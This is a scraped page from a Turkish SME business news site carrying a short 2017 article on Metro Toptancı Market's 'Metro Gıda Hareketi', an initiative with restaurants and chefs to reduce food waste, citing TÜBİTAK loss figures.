			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/tosyov-nezih-kuleyin-kobi-zirvesi-um.jpg" alt="XIII. KOBİ Zirvesi 25 Mayıs&#039;ta İstanbul&#039;da: “Endüstriyel Dönüşümle Geleceğin KOBİ’leri”"  />
			<div class="caption-line"><p>XIII. KOBİ Zirvesi 25 Mayıs'ta</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/haber/osbuk-38-osb-temsilcisini-gebze-guzeller-osbde-bulusturdu-h6274.html" title="OSBÜK, 38 OSB temsilcisini Gebze Güzeller OSB’de buluşturdu" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/osbuk-gebze-toplantisi-um.jpg" alt="OSBÜK, 38 OSB temsilcisini Gebze Güzeller OSB’de buluşturdu"  />
			<div class="caption-line"><p>OSBÜK OSB temsilcilerini buluşturdu</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/osb-tanitim/gosb-teknopark-tan-sanayi-camiasina-rekabet-dopingi-h6275.html" title="GOSB Teknopark&#039;tan sanayi camiasına rekabet dopingi" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/gosb-teknopark-um.jpg" alt="GOSB Teknopark&#039;tan sanayi camiasına rekabet dopingi"  />
			<div class="caption-line"><p>GOSB Teknopark</p></div>						</a>
			</li>


		
           
          </ul>
          </div>
        </div>
        <!-- USTMANSET ***************************************************** -->
                      </div>
        </div>
        <div class="row">
                       <div class="page-header-fixed style span12 hide">
                <div class="title">PANORAMA: <strong class="title"></strong>
                </div>
                <div class="pull-right">                  <span class="scroll-link" id="yorumyaplink"><i class="halflings-icon white comments"></i> Yorum Yap</span>                  <a class="print" href="javascript:window.print()"><i class="halflings-icon white print"></i> Yazdır</a>
                  <a href="javascript:void(0);" onclick="shareFacebook(fbThumb, fbUrl, fbTitle, fbDesc);" class="" rel="nofollow"><i class="halflings-icon white share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
                </div>
            </div>
           
          
          

          <div>
            
            <div id="main" class="span8">
              <div class="row-fulid">
                                                  <div id="breadcrumb">
    <ul class="breadcrumb">
    <li>Buradasınız: </li>
    <li><a href="http://www.kobi-efor.com.tr/">Ana Sayfa</a> <span class="divider">/</span></li>
    <li class="active"><a href="http://www.kobi-efor.com.tr/panorama">PANORAMA</a></li>
  </ul>
</div>
  <article id="haber">
   
  <div class="page-header">
    <div class="row-fluid muted">
      <p class="pull-left">01 Mayıs 2017 Pazartesi 08:00<br>Bu haber <b>3308</b> kez okundu.</p>
      <p class="pull-right karakterislem secilemez">
        <i class="glyphicons-icon font-down"></i>
        <i class="glyphicons-icon font-up"></i>
        <i class="glyphicons-icon font-normal"></i>
        <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
      </p>
    </div>
        <h1 class="title">‘Metro Gıda Hareketi’ başladı</h1><p class="lead">Türkiye’de her yıl üretilen 49 milyon ton meyve ve sebzenin yüzde 25 ila 40’ı arasında değişen miktarı  üretim ve dağıtım zinciri aşamasında kayba uğruyor.</p>

  </div>
    <div class="row-fluid newspic"><img src="http://www.kobi-efor.com.tr/images/haberler/metro_gida_hareketi_basladi_h6374_9dd00.jpg" alt="‘Metro Gıda Hareketi&#039; başladı" /></div>
   
      <div class="row-fluid page-social">
      <div class="span12">
        <div class="shr">
        <div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>



<div class="fb-like" data-href="http://www.kobi-efor.com.tr/panorama/metro-gida-hareketi-basladi-h6374.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div>
<div class="btn-social-wrapper">
                <a class="btn-social btn-facebook" href="https://www.facebook.com/sharer/sharer.php?u=http://www.kobi-efor.com.tr/panorama/metro-gida-hareketi-basladi-h6374.html"
                    onclick="window.open(this.href, 'facebook-share','width=605,height=370');return false;"><i class="social-icon white facebook"></i> Facebook'ta Paylaş
                </a>
                <a class="btn-social btn-twitter" href="http://twitter.com/share?text=%E2%80%98Metro+G%C4%B1da+Hareketi%E2%80%99+ba%C5%9Flad%C4%B1&url=http://www.kobi-efor.com.tr/panorama/metro-gida-hareketi-basladi-h6374.html"
                    onclick="window.open(this.href, 'twitter-share', 'width=570,height=290');return false;"><i class="social-icon white twitter"></i> Tweetle
                </a>
                <a class="btn-social btn-google" href="https://plus.google.com/share?url=http://www.kobi-efor.com.tr/panorama/metro-gida-hareketi-basladi-h6374.html"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white google_plus"></i> Google+ Paylaş
                </a>
                <a class="btn-social btn-linkedin" href="http://www.linkedin.com/shareArticle?mini=true&url=http://www.kobi-efor.com.tr/panorama/metro-gida-hareketi-basladi-h6374.html&title=%E2%80%98Metro+G%C4%B1da+Hareketi%E2%80%99+ba%C5%9Flad%C4%B1"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white linked_in"></i> LinkedIn'de Paylaş
                </a>
</div>



        </div>
      </div>
    </div>
  <div id="newstext" class="row-fluid page-content">
                          <span style="font-family: Verdana;"><span style="font-size: 12px;"><a href="http://www.kobi-efor.com.tr/haberleri/" title="" target="_blank" class="klink"></a>TÜBİTAK’a göre; kayba uğrayan ürün miktarı, 11.6 milyon ton.  Metro Toptancı Market, gıda atık ve kayıplarının en yoğun yaşandığı ev dışı tüketim sektöründeki restoranlar ve şefleriyle gücünü birleştirerek, Metro Gıda Hareketi’ni başlattı. Metro Toptancı Market Türkiye Genel Müdürü Kubilay Özerkan, “Şeflerimizin duyarlılığı ve desteği bu projeyi hak ettiği yere getirecektir” temennisinde bulundu.</span></span>
<p class="MsoNormal"><span style="font-size: 12px;"><span style="font-family: Verdana;"><span style="line-height: 115%;"> </span></span></span></p>
                  </div>

        <div class="row-fluid">
        <div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>



<div class="fb-like" data-href="http://www.kobi-efor.com.tr/panorama/metro-gida-hareketi-basladi-h6374.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div>
<div class="btn-social-wrapper">
                <a class="btn-social btn-facebook" href="https://www.facebook.com/sharer/sharer.php?u=http://www.kobi-efor.com.tr/panorama/metro-gida-hareketi-basladi-h6374.html"
                    onclick="window.open(this.href, 'facebook-share','width=605,height=370');return false;"><i class="social-icon white facebook"></i> Facebook'ta Paylaş
                </a>
                <a class="btn-social btn-twitter" href="http://twitter.com/share?text=%E2%80%98Metro+G%C4%B1da+Hareketi%E2%80%99+ba%C5%9Flad%C4%B1&url=http://www.kobi-efor.com.tr/panorama/metro-gida-hareketi-basladi-h6374.html"
                    onclick="window.open(this.href, 'twitter-share', 'width=570,height=290');return false;"><i class="social-icon white twitter"></i> Tweetle
                </a>
                <a class="btn-social btn-google" href="https://plus.google.com/share?url=http://www.kobi-efor.com.tr/panorama/metro-gida-hareketi-basladi-h6374.html"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white google_plus"></i> Google+ Paylaş
                </a>
                <a class="btn-social btn-linkedin" href="http://www.linkedin.com/shareArticle?mini=true&url=http://www.kobi-efor.com.tr/panorama/metro-gida-hareketi-basladi-h6374.html&title=%E2%80%98Metro+G%C4%B1da+Hareketi%E2%80%99+ba%C5%9Flad%C4%B1"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white linked_in"></i> LinkedIn'de Paylaş
                </a>
</div>



        </div>
</article>

      <div class="row-fluid galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="content">
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/carklar-daha-hizli-donecek-resimleri,44.html" title="Çarklar Daha Hızlı Dönecek">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/2013-ayarli-buyume_1.jpg" alt="Çarklar Daha Hızlı Dönecek" />
          <b>Çarklar Daha Hızlı...</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/turizm-resimleri,43.html" title="Turizm">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/turizm_2.jpg" alt="Turizm" />
          <b>Turizm</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/telekomunikasyon-resimleri,42.html" title="Telekomünikasyon">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/telekomunikasyon_1.jpg" alt="Telekomünikasyon" />
          <b>Telekomünikasyon</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/madencilik-resimleri,41.html" title="Madencilik">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/madencilik_1.jpg" alt="Madencilik" />
          <b>Madencilik</b>
        </a>
      </div>
          </div>
  </div>
    <div id="yorumyap" style="margin:0"></div>
  <div class="row-fluid keywords"><div class="title"><span>Anahtar Kelimeler</span><hr></div><a href="http://www.kobi-efor.com.tr/haberleri/Metro+G%C4%B1da" title="Metro Gıda haberleri">Metro Gıda</a><a href="http://www.kobi-efor.com.tr/haberleri/metro" title="Metro haberleri">Metro</a><a href="http://www.kobi-efor.com.tr/haberleri/T%C3%9CB%C4%B0TAK" title="TÜBİTAK haberleri">TÜBİTAK</a><a href="http://www.kobi-efor.com.tr/haberleri/Metro+Toptanc%C4%B1+Market" title="Metro Toptancı Market haberleri">Metro Toptancı Market</a><a href="http://www.kobi-efor.com.tr/haberleri/Kubilay+%C3%96zerkan" title="Kubilay Özerkan haberleri">Kubilay Özerkan</a></div>
    <section>
            <div id="yorumlar">
            <ul class="nav nav-tabs" id="ytab">
              <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li>
               <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.kobi-efor.com.tr/panorama/metro-gida-hareketi-basladi-h6374.html">0</fb:comments-count></span></a></li>            </ul>

            <div class="tab-content">
                              <div class="tab-pane active" id="yorumpanel">
                                    <div class="yorumlar panel">
                    <div id="yorumpaneli" class="row-fluid">
                    <form  name="comment" class="comment_form" id="addcomment">
                        <div class="span1">
                                                        <img src="http://www.kobi-efor.com.tr/_themes/hs-vertigo/images/no_author.jpg" alt="Misafir Avatar" class="img-rounded"/>                        </div>
                        <div class="span11">
                            <div class="row-fluid">
                                <div class="input-prepend span6">
                                    <span class="add-on">İsim</span>
                                    <input name="isim"  class="span10 adsoyad" type="text"  id="adsoyad" size="30" maxlength="50"  title="Ad soyad gerekli!" />
                                </div>
                                                                <!--div class="input-prepend span6">
                                    <span class="add-on">E-Posta</span>
                                    <input name="email"  class="span9" type="text"  id="email" size="30" maxlength="50" value="" style="width: 202px;"  title="Yayınlanmayacak!" />
                                </div-->
                                                            </div>
                            <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" onfocus="textCheckFocus(this)" onblur="textCheckBlur(this)">Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!</textarea>
                            <div class="span12" style="margin:0;">
                            <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div>
                            <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(6374);return false;" class="btn btn-warning pull-right">Yorum Gönder</a>
                            <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div>
                        </div>
                        <input type="hidden" name="hid" value="6374" />
                        <input type="hidden" name="uid" value="0" />
                        <input type="hidden" name="tip" value="haber" />
                        <input type="hidden" name="cevap" value="" class="answer" />
                        <input type="hidden" name="cevap_id" value="0" class="cevap_id" />
                        <input type="hidden" name="token" value="a747abd1352874afb793d4af04beeb11421e221c" />

                    </form>
                    </div>
                    <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div>
                </div> 
            
            
            
            </div> <!-- .tab-pane -->


                          <div class="tab-pane yorumlar fbpanel" id="facebookpanel">
                <div class="row-fluid">
                  <div id="fb-root"></div>
                  <script>(function(d, s, id) {
                    var js, fjs = d.getElementsByTagName(s)[0];
                    if (d.getElementById(id)) return;
                    js = d.createElement(s); js.id = id;
                    js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
                    fjs.parentNode.insertBefore(js, fjs);
                  }(document, 'script', 'facebook-jssdk'));</script>
                  <div class="fb-comments" data-href="http://www.kobi-efor.com.tr/panorama/metro-gida-hareketi-basladi-h6374.html" data-width="603" data-colorscheme="light" data-numposts="10"></div>
                </div> <!-- #facebookpanel -->
              </div>
            
          </div> <!-- .tab-content -->

        </div> <!-- #yorumlar -->

 
  </section>
    <div class="box haberler">
    <div class="box header">
      <h5><i class="glyphicons-icon globe"></i> <b>İlgili Haberler</b></h5>
    </div>
    <div class="box content">
      <div class="row-fluid first">
              <div class="span3">
          <a href="http://www.kobi-efor.com.tr/panorama/yeni-nokia-tasarimlariyla-fark-yaratiyor-h6390.html" title="Yeni Nokia tasarımlarıyla fark yaratıyor">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yeni_nokia_tasarimlariyla_fark_yaratiyor_h6390_31ec2.jpg" alt="Yeni Nokia tasarımlarıyla fark yaratıyor" />
            <b>Yeni Nokia tasarımlarıyla fark yaratıyor</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/panorama/hp-pavilion-bilgisayarlarinin-yeni-uyelerini-tanitti-h6389.html" title="HP, Pavilion bilgisayarlarının yeni üyelerini tanıttı">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/hp_pavilion_bilgisayarlarinin_yeni_uyelerini_tanitti_h6389_73a1c.jpg" alt="HP, Pavilion bilgisayarlarının yeni üyelerini tanıttı" />
            <b>HP, Pavilion bilgisayarlarının yeni üyelerini tanıttı</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/panorama/avansas-acikladi-isyerleri-laptopu-internetten-aliyor-h6388.html" title="Avansas açıkladı, işyerleri laptopu internetten alıyor">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/avansas_acikladi_isyerleri_laptopu_internetten_aliyor_h6388_a92ef.jpg" alt="Avansas açıkladı, işyerleri laptopu internetten alıyor" />
            <b>Avansas açıkladı, işyerleri laptopu internetten...</b>
          </a>
        </div>  
                </div> 
        <div class="row-fluid">
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/panorama/kyocera-canin-en-iyi-100-kuresel-yenilikcisi-odulunu-aldi-h6387.html" title="Kyocera C.A.’nın ‘En İyi 100 Küresel Yenilikçisi’ ödülünü aldı">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kyocera_canin_en_iyi_100_kuresel_yenilikcisi_odulunu_aldi_h6387_c1506.jpg" alt="Kyocera C.A.’nın ‘En İyi 100 Küresel Yenilikçisi’ ödülünü aldı" />
            <b>Kyocera C.A.’nın ‘En İyi 100 Küresel Yenilikçisi’...</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/panorama/logo-yazilimdan-wings-serisi-urunler-h6386.html" title="Logo Yazılım’dan Wings serisi ürünler">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/logo_yazilimdan_wings_serisi_urunler_h6386_87183.jpg" alt="Logo Yazılım’dan Wings serisi ürünler" />
            <b>Logo Yazılım’dan Wings serisi ürünler</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/panorama/samsung-dex-akilli-telefonu-masaustune-tasiyor-h6385.html" title="Samsung DeX akıllı telefonu masaüstüne taşıyor">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/samsung_dex_akilli_telefonu_masaustune_tasiyor_h6385_7e307.jpg" alt="Samsung DeX akıllı telefonu masaüstüne taşıyor" />
            <b>Samsung DeX akıllı telefonu masaüstüne taşıyor</b>
          </a>
        </div>  
                    </div> 
    </div>
  </div>
   
                 
              </div>
            </div>
                        <div class="aside">
              <div id="sidebar" class="span4">
                <div class="row-fulid">
                                                                    <!-- ONE CIKANLAR  -->
            <div id="onecikanlar">
              <div class="header">
                <h5><i class="halflings-icon white star"></i>Reel Sektör Haberleri</h5>
                <a class="control left" href="#" id="onprev"></a>
                <a class="control right" href="#" id="onnext"></a>
              </div>
              <div class="content">
                  <div class="item">
                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/ptt-ve-vakif-katilim-para-transferi-konusunda-isbirligine-gitti-h6291.html" title="PTT ve Vakıf Katılım para transferi konusunda işbirliğine gitti">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ptt_ve_vakif_katilim_para_transferi_konusunda_isbirligine_gitti_h6291_83b12.jpg" alt="PTT ve Vakıf Katılım para transferi konusunda işbirliğine gitti" />
                    <p>PTT ve Vakıf Katılım para transferi konusunda işbirliğine gitti</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/bilisim-inovasyon-merkezi-ankarada-kuruluyor-h6296.html" title="Bilişim İnovasyon Merkezi Ankara&#039;da kuruluyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/bilisim_inovasyon_merkezi_ankarada_kuruluyor_h6296_4afa4.jpg" alt="Bilişim İnovasyon Merkezi Ankara’da kuruluyor" />
                    <p>Bilişim İnovasyon Merkezi Ankara’da kuruluyor</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/mess-endustri-40in-turkiye-ekonomisine-etkisi-h6295.html" title="MESS Endüstri 4.0&#039;ın Türkiye ekonomisine etkisi">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/mess_endustri_40in_turkiye_ekonomisine_etkisi_h6295_3f191.jpg" alt="MESS Endüstri 4.0’ın Türkiye ekonomisine etkisi" />
                    <p>MESS Endüstri 4.0’ın Türkiye ekonomisine etkisi</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/vaillant-group-turkiyede-alper-avdel-donemi-basladi-h6294.html" title="Vaillant Group Türkiye&#039;de Alper Avdel dönemi başladı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/vaillant_group_turkiyede_alper_avdel_donemi_basladi_h6294_25d8d.jpg" alt="Vaillant Group Türkiye’de Alper Avdel dönemi başladı" />
                    <p>Vaillant Group Türkiye’de Alper Avdel dönemi başladı</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/anadolu-vakfi-mentorluk-programinda-5-donem-59-gencle-basladi-h6302.html" title="Anadolu Vakfı mentorluk programında 5. dönem 59 gençle başladı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/anadolu_vakfi_mentorluk_programinda_5_donem_59_gencle_basladi_h6302_0feb1.jpg" alt="Anadolu Vakfı mentorluk programında 5. dönem 59 gençle başladı" />
                    <p>Anadolu Vakfı mentorluk programında 5. dönem 59 gençle başladı</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/tbdnin-yeni-baskani-rahmi-aktepe-oldu-h6288.html" title="TBD&#039;nin yeni Başkanı Rahmi Aktepe oldu">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tbdnin_yeni_baskani_rahmi_aktepe_oldu_h6288_10182.jpg" alt="TBD’nin yeni Başkanı Rahmi Aktepe oldu" />
                    <p>TBD’nin yeni Başkanı Rahmi Aktepe oldu</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/ihracatin-metalik-yildizlari-7nci-kez-odullendirildi-h6298.html" title="‘İhracatın Metalik Yıldızları&#039; 7&#039;nci kez ödüllendirildi">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ihracatin_metalik_yildizlari_7nci_kez_odullendirildi_h6298_ce54c.jpg" alt="‘İhracatın Metalik Yıldızları’ 7’nci kez ödüllendirildi" />
                    <p>‘İhracatın Metalik Yıldızları’ 7’nci kez ödüllendirildi</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/gelecegi-yazacak-kadinlar-araniyor-h6303.html" title="Geleceği yazacak kadınlar aranıyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/gelecegi_yazacak_kadinlar_araniyor_h6303_2b255.jpg" alt="Geleceği yazacak kadınlar aranıyor" />
                    <p>Geleceği yazacak kadınlar aranıyor</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/mcci-gebze-guzeller-osbyi-inceledi-h6293.html" title="MCCI, Gebze Güzeller OSB&#039;yi inceledi">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/mcci_gebze_guzeller_osbyi_inceledi_h6293_dcccf.jpg" alt="MCCI, Gebze Güzeller OSB’yi inceledi" />
                    <p>MCCI, Gebze Güzeller OSB’yi inceledi</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/bursa-dostum-projesi-basliyor-h6306.html" title="Bursa DOSTUM projesi başlıyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/bursa_dostum_projesi_basliyor_h6306_56fdf.jpg" alt="Bursa DOSTUM projesi başlıyor" />
                    <p>Bursa DOSTUM projesi başlıyor</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/halkbank-tan-kobileri-gelistiren-platform-h6304.html" title="Halkbank&#039;tan KOBİ&#039;leri geliştiren platform">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/halkbank_tan_kobileri_gelistiren_platform_h6304_9f242.jpg" alt="Halkbank&#039;tan KOBİ’leri geliştiren platform" />
                    <p>Halkbank&#039;tan KOBİ’leri geliştiren platform</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/ostimden-sanayi-universite-isbirligine-ornek-h6307.html" title="OSTİM&#039;den sanayi üniversite işbirliğine örnek">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ostimden_sanayi_universite_isbirligine_ornek_h6307_452d5.jpg" alt="OSTİM’den sanayi üniversite işbirliğine örnek" />
                    <p>OSTİM’den sanayi üniversite işbirliğine örnek</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/izoderin-yeni-baskani-levent-pelesen-oldu-h6300.html" title="İZODER&#039;in yeni Başkanı Levent Pelesen oldu">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/izoderin_yeni_baskani_levent_pelesen_oldu_h6300_b25d6.jpg" alt="İZODER’in yeni Başkanı Levent Pelesen oldu" />
                    <p>İZODER’in yeni Başkanı Levent Pelesen oldu</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/tim-teb-girisim-evi-2016-yilinda-10-milyon-tl-ihracata-imza-atti-h6299.html" title="TİM-TEB Girişim Evi 2016 yılında 10 milyon TL ihracata imza attı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tim_teb_girisim_evi_2016_yilinda_10_milyon_tl_ihracata_imza_atti_h6299_fb2d8.jpg" alt="TİM-TEB Girişim Evi 2016 yılında 10 milyon TL ihracata imza attı" />
                    <p>TİM-TEB Girişim Evi 2016 yılında 10 milyon TL ihracata imza attı</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/fiba-commercial-propertiese-buyuk-odul-h6308.html" title="Fiba Commercial Properties&#039;e büyük ödül">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/fiba_commercial_propertiese_buyuk_odul_h6308_4671b.jpg" alt="Fiba Commercial Properties’e büyük ödül" />
                    <p>Fiba Commercial Properties’e büyük ödül</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/berat-albayrak-gelisen-milli-sanayi-ile-ulke-kalkinmaya-devam-edecek-h6297.html" title="Berat Albayrak: &#039;Gelişen milli sanayi ile ülke kalkınmaya devam edecek”">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/berat_albayrak_gelisen_milli_sanayi_ile_ulke_kalkinmaya_devam_edecek_h6297_ed194.jpg" alt="Berat Albayrak: “Gelişen milli sanayi ile ülke kalkınmaya devam edecek”" />
                    <p>Berat Albayrak: “Gelişen milli sanayi ile ülke kalkınmaya devam edecek”</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/cukurovali-kobiler-borgip-toplantisinda-bulustu-h6292.html" title="Çukurovalı KOBİ&#039;ler Borgip toplantısında buluştu">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/cukurovali_kobiler_borgip_toplantisinda_bulustu_h6292_71bc9.jpg" alt="Çukurovalı KOBİ’ler Borgip toplantısında buluştu" />
                    <p>Çukurovalı KOBİ’ler Borgip toplantısında buluştu</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/plastik-sanayi-mukemmeliyette-ilerliyor-h6301.html" title="Plastik sanayi mükemmeliyette ilerliyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/plastik_sanayi_mukemmeliyette_ilerliyor_h6301_b8fd4.jpg" alt="Plastik sanayi mükemmeliyette ilerliyor" />
                    <p>Plastik sanayi mükemmeliyette ilerliyor</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/osbukte-ruhsat-izin-ve-imar-komisyonu-toplantisi-yapildi-h6305.html" title="OSBÜK&#039;te &#039;Ruhsat, İzin ve İmar Komisyonu” toplantısı yapıldı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/osbukte_ruhsat_izin_ve_imar_komisyonu_toplantisi_yapildi_h6305_c205f.jpg" alt="OSBÜK’te “Ruhsat, İzin ve İmar Komisyonu” toplantısı yapıldı" />
                    <p>OSBÜK’te “Ruhsat, İzin ve İmar Komisyonu” toplantısı yapıldı</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/ebrdnin-turk-tarimina-katkisi-1-milyar-avroyu-asti-h6289.html" title="EBRD&#039;nin Türk tarımına katkısı 1 milyar avroyu aştı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ebrdnin_turk_tarimina_katkisi_1_milyar_avroyu_asti_h6289_44572.jpg" alt="EBRD’nin Türk tarımına katkısı 1 milyar avroyu aştı" />
                    <p>EBRD’nin Türk tarımına katkısı 1 milyar avroyu aştı</p>
                  </a>
                  
                                  </div>
                <div class="item">                                  </div>
              </div>
            </div>                                                <!-- YAZARLAR -->
            <div id="syazar">
              <div class="header">
                <h5><a href="http://www.kobi-efor.com.tr/yazarlar.html" title="Yazarlar">Yazarlar</a></h5>
                              </div>
              <div class="content">
                <div class="item">

                                  <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/turkiye-ve-avrasya-makale,382.html" title="Yalçın Sönmez  (EDİTÖR)" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/yalcin_sonmez_editor.jpg" alt="Yalçın Sönmez  (EDİTÖR)" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/turkiye-ve-avrasya-makale,382.html" title="Yalçın Sönmez  (EDİTÖR)" >Yalçın Sönmez  (EDİTÖR)</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/turkiye-ve-avrasya-makale,382.html" title="Türkiye ve Avrasya" >Türkiye ve Avrasya</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/kobi-zirvesinde-bulusalim-makale,381.html" title="Hilmi Develi" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/hilmi_develi_1_1.jpg" alt="Hilmi Develi" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/kobi-zirvesinde-bulusalim-makale,381.html" title="Hilmi Develi" >Hilmi Develi</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/kobi-zirvesinde-bulusalim-makale,381.html" title="KOBİ Zirvesi&#039;nde Buluşalım…" >KOBİ Zirvesi’nde Buluşalım…</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/iyi-kaptan-firtinada-belli-olur-makale,380.html" title="Haluk Ünaldı" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/haluk-unaldi-yazar.jpg" alt="Haluk Ünaldı" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/iyi-kaptan-firtinada-belli-olur-makale,380.html" title="Haluk Ünaldı" >Haluk Ünaldı</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/iyi-kaptan-firtinada-belli-olur-makale,380.html" title="İyi Kaptan Fırtınada Belli Olur!" >İyi Kaptan Fırtınada Belli Olur!</a></p>
                    </div>
                  </div>
